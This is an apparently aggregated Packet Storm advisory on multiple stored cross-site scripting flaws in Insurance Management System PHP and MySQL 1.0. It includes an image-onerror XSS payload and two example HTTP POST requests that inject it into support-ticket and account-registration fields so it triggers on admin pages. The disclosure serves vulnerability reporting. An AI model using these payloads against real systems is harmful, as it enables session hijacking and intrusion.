Security
Headlines
HeadlinesLatestCVEs

Headline

Insurance Management System PHP And MySQL 1.0 Cross Site Scripting

Insurance Management System PHP and MySQL version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

Packet Storm
#sql#xss#vulnerability#windows#php#auth
# Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS# Date: 2024-02-08# Exploit Author: Hakkı TOKLU# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html# Version: 1.0# Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0Support TicketClick on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered.   Example Request :       POST /e-insurance/Script/user/core/new_ticket HTTP/1.1    Host: localhost    Content-Type: application/x-www-form-urlencoded    Content-Length: 139    Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41    category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1Create AccountClick on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameter, then click Create Account button. XSS will be triggered when admin visits Users page.  Example Request :     POST /e-insurance/Script/core/new_account HTTP/1.1    Host: localhost    Content-Type: application/x-www-form-urlencoded    Content-Length: 303    Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15    fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3